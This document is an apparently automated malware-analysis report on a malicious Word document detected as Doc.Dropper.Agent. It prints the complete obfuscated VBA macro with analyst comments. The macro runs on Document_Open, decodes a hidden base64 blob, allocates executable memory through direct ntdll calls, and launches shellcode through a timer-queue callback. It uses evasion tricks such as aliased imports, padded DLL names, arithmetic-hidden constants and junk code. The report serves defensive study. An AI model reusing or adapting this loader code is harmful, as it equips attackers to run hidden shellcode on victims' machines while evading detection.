MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6336277-0'. Static analysis revealed VBA macros within the document, including a 'Document_Open' auto-execution macro. The extracted macro code does not contain any URL or network call of its own: it reads an obfuscated base64 blob stored in a UserForm control (the last 7844 characters of the selected item's Name on `wednesday.vorstellen`), decodes it to 5883 bytes, allocates an RWX region in the Word process with NtAllocateVirtualMemory (MEM_COMMIT, PAGE_EXECUTE_READWRITE), copies the bytes in with NtWriteVirtualMemory (also used as a memcpy primitive), and executes them through a CreateTimerQueueTimer callback with DueTime 0 — an in-memory shellcode loader built on direct ntdll calls (MITRE ATT&CK T1106 Native API) rather than a classic download-and-run dropper. The real API names are hidden behind Alias declarations with trailing-space library names, all constants are hidden as arithmetic, and the code is padded with junk assignments, Pmt() calls and song-lyric comments. What the decoded shellcode does (for example fetching a secondary payload) is not visible from the macro and would require analysing the 5883 decoded bytes. The document body content appears to be a narrative and does not directly contribute to the malicious functionality; the macro is the primary vector.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6336277-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6336277-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Dim expeditious As Long -
Embedded URL info EMBEDDED_URL One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed here is an XMP/RDF, Dublin Core or DrawingML namespace identifier taken from embedded image/drawing metadata in the document body; none is referenced by the macro code, so they are not indicators of a contacted endpoint. URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13512 bytes |
SHA-256: 6347bd866389f2ec8ebd06b2eebd531a5245b0374d89b7f8fd495e2736af69d8 |
|||
Preview script — first 1,000 lines of the extracted script (macros.bas as decoded by olevba: the modules ThisDocument, dimidium, wednesday and adolfus concatenated, each starting at its Attribute VB_Name line)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analysis] Obfuscated base64 decoder. `calochortus` is the encoded text
' pulled from the UserForm by infuriation(); the return String carries the
' raw decoded bytes (a Byte array assigned to a String is copied byte for
' byte, with no character conversion) and is later treated as shellcode by
' cestida(). The many Dim / arithmetic / Pmt statements whose results are
' never read are junk padding; only the lines annotated below do work.
Public Function halvesgo(calochortus) As String
Dim bath As Long
libere = "beforementioned"
Dim caulked() As Byte
Dim bug As String
Dim detraction As Variant
' [analysis] tiene / metage / churning: shift tables for the decode loop
Dim tiene(63) As Long
Dim lowpitched As Long
chasse = chasse \ 295
Dim jobbing As Variant
Dim aggravable As Long
Dim saltatory As Long
Dim byname As Long
Dim metage(63) As Long
tridentiferous = chasse / 122
' [analysis] output buffer; 5883 bytes are written (7844 chars * 3 / 4)
Dim singulis(6962) As Byte
Dim doublespaced As Integer
Dim churning(63) As Long
Dim insipidly As Long
Dim tome As Integer
' [analysis] constants hidden as arithmetic: bloke = 262144 (2^18),
' manful = 256, refiner = 65536 (2^16)
bloke = 27 - 121 + 262238
scrupulously = 6 - 99 + 4125
manful = 124 - 39 + 171
refiner = 36 - 15 + 65515
daub = 115 - 44 - 8
whissky = 124 - 104 + 258028
' [analysis] jaggedness = 65280 (0xFF00), down = 255 (0xFF)
jaggedness = 1 - 91 + 65370
down = 126 - 115 + 244
Dim lyrebird As Variant
' [analysis] barbell = 16711680 (0xFF0000), gardening = 64 (2^6),
' ashamed = 4096 (2^12)
gambol = 56 - 90 + 16515106
barbell = 97 - 11 + 16711594
gardening = 108 - 77 + 33
ashamed = 69 - 15 + 4042
Dim bonedry As Integer
Dim bareheaded As Long
altarstairs = 18 - 41 + 23
delection = 44 - 1 + 7800
Dim bedewed() As Byte
Dim cordierite As Variant
Dim scrimshanker As Variant
' [analysis] StrConv(..., 128) = vbFromUnicode: one byte per input character
bedewed = VBA.StrConv(calochortus, 128)
Dim seagod As Variant
wallet = 18
benzyl = 24391
chronometrical = 195932
' [analysis] Pmt is VBA's built-in financial function, invoked as a
' statement with the result discarded -- padding (repeated several times)
Pmt 0, wallet, 27674, 41409, 3
' [analysis] exalte = 7843: exactly 7844 input characters are consumed
exalte = 7843
' [analysis] vbKeyShift = 16, so emollient = 4
emollient = vbKeyShift - 12
' [analysis] first layer: even-index bytes are decremented by 4, odd-index
' bytes by 3, recovering plain base64 characters (the stored blob is not
' valid base64 until this runs)
For cubicle = 0 To exalte
If cubicle Mod 2 = 0 Then
bedewed(cubicle) = bedewed(cubicle) - emollient
Else
bedewed(cubicle) = bedewed(cubicle) - (emollient - 1)
End If
Next cubicle
changeling = 25
flight = 35689
amyotrophia = 434778
Pmt 0, changeling, 29134, 27921, 7
doublespaced = 0
accost = 73 - 16 - 57
collectivization = 87 - 99 + 55
' [analysis] 256-entry character -> 6-bit value table built by overstrain()
infreqent = overstrain
' [analysis] loop runs 0..63; bootless(x, y, 63) multiplies, so
' metage(i) = i * 64, churning(i) = i * 4096, tiene(i) = i * 262144
For saltatory = (7 - 7) * 1 To (50 + 13) * (5 - 4)
metage(saltatory) = bootless(saltatory, gardening, 63)
churning(saltatory) = bootless(saltatory, ashamed, 63)
tiene(saltatory) = bootless(saltatory, bloke, 63)
Next saltatory
mercurial = 83
dinornis = 27715
anagasta = 221887
Pmt 0, mercurial, 28439, 19214, 7
caulked = bedewed
minutes = 69 - 89 + 24
box = 118
band = 23057
intensifying = 159448
Pmt 0, box, 11660, 51971, 3
' [analysis] anguidae = 3 and haulage = 2 are index offsets for the loop below
anguidae = 123 - 30 - 90
chasse = Rnd(161)
libere = "disorder"
heckelphone = anguidae + 1
haulage = 103 - 30 - 71
' [analysis] main decode loop: four characters -> 24-bit value -> three
' bytes. `lowpitched` is advanced by 3 inside the body, so the effective
' step is 4 characters per iteration.
For lowpitched = 0 To exalte
established = caulked(lowpitched)
oldtimer = caulked(lowpitched + 2)
confiscation = churning(infreqent(caulked(lowpitched + 1)))
oceania = metage(infreqent(oldtimer)) + infreqent(caulked(lowpitched + anguidae))
' [analysis] v = c0 << 18 | c1 << 12 | c2 << 6 | c3
aggravable = tiene(infreqent(established)) + confiscation + oceania
' [analysis] bootless(x, y, 55) is And, bootless(x, y, 45) is integer
' division: byte0 = (v And 0xFF0000) \ 65536, byte1 = (v And 0xFF00) \ 256,
' byte2 = v And 0xFF
saltatory = bootless(aggravable, barbell, 55)
singulis(byname) = bootless(saltatory, refiner, 45)
saltatory = bootless(aggravable, jaggedness, 55)
singulis(byname + 1) = bootless(saltatory, manful, 45)
singulis(byname + haulage) = bootless(aggravable, down, 55)
byname = byname + haulage + 1
lowpitched = lowpitched + 3
Next
' [analysis] Byte array -> String: raw bytes, no conversion
halvesgo = singulis
End Function
' [analysis] Orchestrator called from Document_Open(): pulls the encoded
' blob out of a UserForm control, decodes it with halvesgo(), stages it as
' executable memory via cestida() and triggers it through a timer-queue
' callback. The unused string/numeric assignments and the Pmt statements
' (results discarded) are junk padding.
Function infuriation()
Dim beret As Integer
Dim suspension As String
' [analysis] Day(#12/5/2013#) = 5: sets control `vorstellen` on UserForm
' `wednesday` (the module with a GUID VB_Base further down) to item 5,
' presumably the item that carries the payload. .SelectedItem below
' suggests a TabStrip/MultiPage control -- confirm against the form's
' frm/frx storage.
wednesday.vorstellen.Value = Day(#12/5/2013#)
varday = eventual = "littorinidae"
bandsman = "greenery"
somme = "vortex"
meningism = "ageless"
alloyage = "karat"
chatterer = "dolce"
henbane = "eventuate"
gloved = "rudimental"
Set moo = wednesday.vorstellen.SelectedItem
enter = 47
shrublet = 21276
roguery = 479669
Pmt 0, enter, 31219, 19031, 8
' [analysis] the encoded payload is stored in the selected item's Name
' property; cocklebur = 7844, so its last 7844 characters are taken
papiermache = moo.Name
cocklebur = 106 - 108 + 7846
neologist = Right(papiermache, cocklebur)
' [analysis] decode: returns a String whose buffer holds the raw bytes
averuncate = halvesgo(neologist)
rove = 37
pothos = 30041
acarophobia = 415628
Pmt 0, rove, 19041, 49774, 8
haptic = "cetoniidae"
' [analysis] the two #If arms (0 < Win64 vs. Not) pick LongPtr (64-bit)
' or Long (32-bit) locals. `concede` is the entry-point offset added to the
' shellcode base: 2064 on the LongPtr arm, 781 + 3459 = 4240 on the Long arm.
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim bowie As Variant
Dim tongu As LongPtr
Dim talcum As LongPtr
Dim flemish As Long
Dim discerning As Long
Dim entre As LongPtr
Dim orthodontics As LongPtr
Dim filamentiferous As LongPtr
concede = 117 - 108 + 2055
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim sequestrate As String
Dim talcum As Long
Dim copartnership As Long
Dim tongu As Long
Dim entre As Long
hynerpeton = 109 - 8 + 680
Dim orthodontics As Long
Dim filamentiferous As Long
concede = hynerpeton + 3459
#End If
filiform = 41 - 5 - 36
nonparametric = "drub"
bessera = "enlarger"
articulation = 32 - 5 + 4069
decant = 101
trypetidae = 2106
sweat = 517771
Pmt 0, decant, 23012, 44360, 2
unalterably = "calloused"
illae = "accouplement"
voluntariness = "champak"
gametophore = "uningenuous"
witheringly = 61
soldierlike = 10378
pliers = 175775
Pmt 0, witheringly, 33380, 51109, 2
cleric = averuncate
' [analysis] `hellenism` and `herbs` are never assigned anywhere in the
' listing (implicit Empty variants) -- padding
burp = hellenism
adductive = "blink"
' [analysis] cestida(): NtAllocateVirtualMemory(RWX) + NtWriteVirtualMemory;
' returns the base address of the copied shellcode
tongu = cestida(cleric)
mckinley = herbs
Dim assumed As Variant
Dim matine As Byte
' [analysis] entre = 0, reused for every NULL / zero argument below
entre = 92 - 57 - 35
' [analysis] callback address = shellcode base + entry offset
talcum = tongu + concede
orthodontics = 116 - 19 + 201430
filamentiferous = 125 - 11 + 3386
' [analysis] moosewood = CreateTimerQueueTimer(&orthodontics, TimerQueue
' NULL, Callback = talcum, Parameter NULL, DueTime 0, Period 0, Flags 0):
' the thread pool invokes the shellcode address immediately on a worker
' thread of the Word process -- code execution without CreateThread or a
' child process. `orthodontics` receives the timer handle (passed ByRef).
irreversibility = moosewood(orthodontics, entre, talcum, entre, entre, entre, entre)
legalized = 101
specify = 39387
mew = 544138
Pmt 0, legalized, 28936, 28597, 4
End Function
' [analysis] Auto-execution entry point: Word runs Document_Open as soon as
' the document is opened with macros enabled (no user action beyond
' enabling content). The call to infuriation() is the only statement that
' matters; the remaining assignments and the Pmt call are padding.
Private Sub Document_Open()
Dim expeditious As Long
Dim annual As Variant
carbonyl = "rudera"
infuriation
castilleja = 18
evulsion = 5930
impersonal = 429392
Pmt 0, castilleja, 29707, 42895, 8
End Sub
Attribute VB_Name = "dimidium"
' [analysis] API import module. Each Declare hides the real export behind a
' random VBA name via Alias, and most Lib strings carry a trailing space
' ("ntdll.dll ", "Shlwapi.dll ") -- likely meant to defeat signatures that
' match the exact DLL name; the loader appears to tolerate it. The
' interleaved song-lyric comments are padding. The two #If arms provide
' PtrSafe/LongPtr (64-bit) and Long (32-bit) variants of the same set.
' Only three imports are actually called by the extracted code:
'   arriere   -> NtAllocateVirtualMemory (RWX region, see adolfus.cestida)
'   cannular  -> NtWriteVirtualMemory    (memcpy into that region)
'   moosewood -> CreateTimerQueueTimer   (runs the region via callback)
' The other Declares are never referenced, and GetOverlappedResult /
' SleepConditionVariableSRW are not documented Shlwapi exports, so they
' look like decoys.
' Knew it was gonna be a long night
' Baby, without warning
#If (18 * 3 + 4) > (7 - 3 * 2) And (60 - 5 * 12) * 2 < (Win64) Then
' Baby, without warning
' And hit me like a hurricane
' [analysis] unreferenced decoy
Public Declare PtrSafe Function fulgurate Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal uninformative As Any, charinile As Any, ceiba As Any, aspersions As Any) As LongPtr
' Baby, without warning
' Hit me like a hurricane
' [analysis] unreferenced
Public Declare PtrSafe Function nonius Lib "ntdll.dll " Alias "AcquireSRWLockShared" (misproportioned As Any) As LongPtr
' But just your sight had my heart storming
' Baby, without warning
' [analysis] USED (adolfus.countershot): NtWriteVirtualMemory(ProcessHandle,
' BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten)
Public Declare PtrSafe Function cannular Lib "ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal hypermodern As Any, ByVal fairway As Any, ByVal natures As Any, ByVal antipsychotic As Any, ByVal centrifugation As Any) As LongPtr
' But just your sight had my heart storming
' From the moment when
' [analysis] unreferenced decoy
Public Declare PtrSafe Function motionlessness Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal jussive As Any, accent As Any, acknowledgment As Any, categorized As Any) As LongPtr
' We locked eyes over whiskey on ice
' Then you rolled in with your hair in the wind
' [analysis] USED (ThisDocument.infuriation): CreateTimerQueueTimer(
' phNewTimer, TimerQueue, Callback, Parameter, DueTime, Period, Flags);
' Callback is set to the shellcode address
Public Declare PtrSafe Function moosewood Lib "Kernel32" Alias "CreateTimerQueueTimer" (mesonic As Any, ByVal tripsis As Any, ByVal antecubital As Any, ByVal camelot As Any, ByVal capouch As Any, ByVal intervertebral As Any, ByVal defectiveness As Any) As Long
' And hit me like a hurricane' Hit me like a hurricane
' [analysis] unreferenced
Public Declare PtrSafe Function aeciospore Lib "ntdll.dll" Alias "NtCreateEventPair" (normalness As LongPtr, fled As LongPtr, chemotaxis As LongPtr) As LongPtr
' I was doing alright
' I wouldnt be in my truck
' [analysis] unreferenced
Public Declare PtrSafe Function abbess Lib "Shlwapi.dll" Alias "CreateFileWrapW" (beck As LongPtr) As LongPtr
' Driving us to your house
' Then you rolled in with your hair in the wind
' [analysis] USED (adolfus.cestida): NtAllocateVirtualMemory(ProcessHandle,
' *BaseAddress, ZeroBits, *RegionSize, AllocationType, Protect). The fourth
' parameter is spelled "unoiledByVal": the ByVal keyword is glued to the
' name, so RegionSize is declared ByRef here -- which is what the NT
' signature needs; the call site also marks ByVal/ByRef per argument.
Public Declare PtrSafe Function arriere Lib "ntdll.dll " Alias _
"NtAllocateVirtualMemory" (airconditioned As LongPtr, fireeater As LongPtr, ByVal grammatically As LongPtr, unoiledByVal As LongPtr, extirpate As LongPtr, ByVal defective As LongPtr) As LongPtr
' You wrecked my whole world when you came
' But just your sight had my heart storming
#End If
' You wrecked my whole world when you came
' Rain was driving, thunder, lightning
' [analysis] 32-bit (Long) arm: same set of imports, same three in use
#If (18 * 3 + 4) > (7 - 3 * 2) And Not (60 - 5 * 12) * 2 < (Win64) Then
' The moon went hiding, stars quit shining
' You wrecked my whole world when you came
' [analysis] USED: CreateTimerQueueTimer (32-bit)
Public Declare Function moosewood Lib "Kernel32" Alias "CreateTimerQueueTimer" (cocopa As Any, ByVal pediculus As Any, ByVal blasphemously As Any, ByVal flora As Any, ByVal achylia As Any, ByVal boatmanship As Any, ByVal disparage As Any) As Long
' The moon went hiding, stars quit shining
' If I woulda just layed my drink down
' [analysis] unreferenced
Public Declare Function genetta Lib "ntdll.dll " Alias "AcquireSRWLockShared" (pinchbeck As Any) As Long
' Hit me like a hurricane
' But just your sight had my heart storming
' [analysis] USED: NtAllocateVirtualMemory (32-bit); "softishByVal" is the
' same glued-keyword artefact as above
Public Declare Function arriere Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (aguets As Long, spiculate As Long, ByVal anomalousness As Long, softishByVal As Long, aukland As Long, ByVal sula As Long) As Long
' But just your sight had my heart storming
' Baby, without warning
' [analysis] unreferenced decoy
Public Declare Function dreamer Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal aimlessness As Any, nonfunctional As Any, pelecanus As Any, mont As Any) As Long
' But you rolled in with your hair in the wind
' And hit me like a hurricane
' [analysis] USED: NtWriteVirtualMemory (32-bit)
Public Declare Function cannular Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal chinaware As Any, ByVal annuity As Any, ByVal choleric As Any, ByVal taxidermist As Any, ByVal ferine As Any) As Long
' Baby, without warning
' But you rolled in with your hair in the wind
' [analysis] unreferenced
Public Declare Function crumb Lib "ntdll.dll" Alias "NtCreateEventPair" (forcible As Long, beslaver As Long, acanthoid As Long) As Long
' We locked eyes over whiskey on ice
' If I woulda just layed my drink down
' [analysis] unreferenced decoy
Public Declare Function copywriter Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal culmination As Any, institutional As Any, overvalue As Any, acetous As Any) As Long
' If I woulda just layed my drink down
' Rain was driving, thunder, lightning
' From the moment when
' But just your sight had my heart storming
#End If
' Rain was driving, thunder, lightning
' And hit me like a hurricane
' [analysis] Three-way arithmetic dispatch used by halvesgo(). The Case
' expressions fold to constants:
'   45 -> ellipse \ amphiprostylar   (integer division, byte extraction)
'   55 -> ellipse And amphiprostylar (bit mask)
'   63 -> ellipse * amphiprostylar   (building the shift tables)
' Any other selector leaves the return value Empty.
Function bootless(ellipse, amphiprostylar, happens)
Select Case happens
Case 45 + (10 / 2 - 5)
bootless = ellipse \ amphiprostylar
Case 55 + (5 - 3) / 2 - 1
bootless = ellipse And amphiprostylar
Case 63 + (56 / 7 - 4 * 2)
bootless = ellipse * amphiprostylar
End Select
End Function
Attribute VB_Name = "wednesday"
Attribute VB_Base = "0{02EFB5F7-614F-4EC3-91E9-A2E684199AA0}{ACD13E8A-B0FF-405A-8B02-436B4B8152A0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "adolfus"
' [analysis] Stages the decoded bytes as executable memory in the current
' process and returns the base address. `sacrificial` is the String
' produced by halvesgo(), received as a Variant. Unused locals, the
' Math.Round assignments and the Pmt statement are padding.
Function cestida(sacrificial)
Dim stupefaction As Integer
Dim mustelus As Long
Dim desecrating As Integer
Dim beplastered As Integer
' [analysis] pointer-sized locals per arm; animatistic = pointer size
' (8 on the LongPtr arm, 4 on the Long arm)
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim falconine As Long
Dim daylight As LongPtr
animatistic = 87 - 46 - 33
Dim guimpe As LongPtr
Dim counterspy As Byte
Dim carapidae As Variant
Dim slithery As LongPtr
Dim gowned As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim daylight As Long
animatistic = 96 - 122 + 30
Dim guimpe As Long
Dim slithery As Long
#End If
' [analysis] copy `animatistic` bytes from VarPtr(sacrificial) + 8 -- the
' data field of the 16-byte VARIANT, i.e. its BSTR pointer -- into
' `daylight`, using NtWriteVirtualMemory as a memcpy (countershot).
' Afterwards `daylight` holds the address of the decoded bytes.
pseudowintera = VarPtr(daylight)
highlevel = countershot(pseudowintera, VarPtr(sacrificial) + 8, animatistic)
' [analysis] NtAllocateVirtualMemory arguments (constants folded):
'   dryopteridaceae = -1   ProcessHandle (current process pseudo-handle)
'   guimpe          = 0    BaseAddress in/out (kernel chooses; receives base)
'   bridoon         = 0    ZeroBits
'   slithery        = 9572 RegionSize
'   moonworship     = 4096 AllocationType = MEM_COMMIT (0x1000)
'   assembled       = 64   Protect = PAGE_EXECUTE_READWRITE (0x40)
dryopteridaceae = 40 - 28 - 13
guimpe = 89 - 104 + 15
bridoon = 77 - 119 + 42
slithery = 114 - 14 + 9472
moonworship = 102 - 62 + 4056
assembled = 123 - 1 - 58
diomedeidae = arriere(ByVal dryopteridaceae, guimpe, ByVal bridoon, slithery, ByVal moonworship, ByVal assembled)
tridentiferous = Math.Round(395)
chasse = Math.Round(485)
' [analysis] 48 - 59 + 5894 = 5883 bytes (= 7844 * 3 / 4): copy the decoded
' shellcode from `daylight` into the RWX region at `guimpe`
countershot guimpe, daylight, 48 - 59 + 5894
figurate = 31
celioma = 10003
pickerel = 487528
Pmt 0, figurate, 10202, 47213, 4
' [analysis] return the RWX base; infuriation() adds the entry offset
cestida = guimpe
End Function
' [analysis] memcpy built on NtWriteVirtualMemory against the current
' process: copies `shrimp` bytes from address `maid` to address
' `consternation`. Using the NT write primitive avoids importing
' RtlMoveMemory/CopyMemory, which static rules commonly flag. No meaningful
' value is returned; the extra locals and the Pmt statement are padding.
Function countershot(consternation, maid, shrimp)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim estonia As String
Dim acrophobic As Variant
Dim armagnac As LongPtr
Dim abalone As LongPtr
Dim halter As LongPtr
Dim arianism As Long
Dim brimming As LongPtr
Dim knesset As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim abalone As Long
Dim hexagon As Integer
Dim armagnac As Long
Dim omophagia As Long
Dim brimming As Long
Dim iodination As String
Dim halter As Long
Dim golconda As Long
Dim knesset As Long
Dim dracocephalum As Long
Dim reverberate As String
#End If
cancun = cancun
chasse = Math.Round(478)
' [analysis] abalone = destination address, knesset = byte count,
' brimming = source address
abalone = consternation
knesset = shrimp
chasse = Fix(206)
brimming = maid
bibber = 108
altitude = 25970
astringents = 502619
Pmt 0, bibber, 30818, 20080, 3
chasse = Fix(470)
' [analysis] armagnac = -1, the current-process pseudo-handle:
' NtWriteVirtualMemory(-1, abalone, brimming, knesset, halter); `halter`
' is the NumberOfBytesWritten argument, left at its default 0 (NULL)
armagnac = 123 - 69 - 55
cannular ByVal armagnac, abalone, brimming, knesset, halter
zucchini = cancun
End Function
' [analysis] Builds the base64 reverse-lookup table used by halvesgo():
' composition(c) = 6-bit value of ASCII character c, every other entry 0.
' The result is the standard alphabet (A-Z a-z 0-9 + /):
'   'A'(65)..'Z'(90) -> 0..25    (loop bound 91 also writes '[', harmless)
'   '0'(48)..'9'(57) -> 52..61   (bound 58 also writes ':')
'   'a'(97)..'z'(122) -> 26..51  (bound 123 also writes '{')
'   '/'(47) -> 63, '+'(43) -> 62
Function overstrain()
Dim composition(255) As Byte
' [analysis] 125 - 6 - 54 = 65 = 'A'
dinocerata = 125 - 6 - 54
Do While dinocerata <= 90 + 1
composition(dinocerata) = dinocerata - 65
dinocerata = dinocerata + 1
Loop
' [analysis] 48 = '0'
dinocerata = 48
Do While dinocerata <= 50 + 8
composition(dinocerata) = dinocerata + 4
dinocerata = dinocerata + 1
Loop
' [analysis] 97 = 'a'
dinocerata = 97
Do While dinocerata <= 120 + 3
composition(dinocerata) = dinocerata - 71
dinocerata = dinocerata + 1
Loop
' [analysis] '/' -> 63, '+' -> 60 + 2 = 62
composition(47) = 63
dinocerata = 43
composition(dinocerata) = 60 + 2
overstrain = composition
End Function
|
|||